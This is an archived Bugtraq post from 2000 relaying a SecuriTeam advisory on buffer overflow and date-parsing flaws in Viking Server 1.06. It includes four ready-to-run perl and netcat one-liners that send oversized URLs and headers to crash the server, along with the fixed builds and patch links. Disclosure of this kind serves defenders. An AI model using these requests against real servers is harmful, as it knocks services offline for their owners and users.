[16419] in bugtraq
[NT] Viking security vulnerabilities enable remote code execution
daemon@ATHENA.MIT.EDU (Aviram Jenik)
Mon Aug 28 15:45:15 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="Windows-1252"
Content-Transfer-Encoding: 7bit
Message-Id: <399a01c01122$0d7f2310$0201a8c0@aviram>
Date: Mon, 28 Aug 2000 20:59:10 +0200
Reply-To: Aviram Jenik <aviram@BEYONDSECURITY.COM>
From: Aviram Jenik <aviram@BEYONDSECURITY.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com
Viking security vulnerabilities enable remote code execution (long
URL,
date parsing)
----------------------------------------------------------------------------
----
SUMMARY
<http://www.robtex.com/viking/> Viking Server is a multi-protocol
Internet server/proxy for Windows 95/NT that supports a wide range of
protocols such as HTTP, FTP, SOCKS, DNS, TELNET, SMTP, POP3, UUCP, FCP,
ICP, etc. Unfortunately it does not perform proper buffer bounds checking,
enabling attackers to launch a buffer overflow attack and possibly execute
arbitrary code. Also, an incorrect parsing of non-date data causes an
exception, enabling remote attackers to cause a Denial of Service attack
against the product.
DETAILS
Vulnerable systems:
Viking 1.06 build 355 and prior
Immune systems:
Viking 1.06 build 370 and above
Exploit:
Any of the following HTTP commands will crash the server:
(1)
GET [x11765] HTTP/1.1<enter><enter>
(Cmd: perl -e "print \"GET @{['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80)
(2)
GET / HTTP/1.1<enter>
Unless-Modified-Since: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since:
@{['x'x14765]}\n\n\""|nc 127.1 80)
(3)
GET / HTTP/1.1<enter>
If-Range: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{['x'x14765]}\n\n\""|nc
127.1 80)
(4)
GET / HTTP/1.1<enter>
If-Modified-Since: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since:
@{['x'x14765]}\n\n\""|nc 127.1 80)
Patch:
Robotex has responded immediately and released a patch that deals with
these issues.
You can download the patch at:
ftp://ftp.robtex.com/robtex/viking/beta/viking.zip
http://www.robtex.com/files/viking/beta/viking.zip
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
====================
--
Aviram Jenik
Beyond Security Ltd.
http://www.BeyondSecurity.com
http://www.SecuriTeam.com
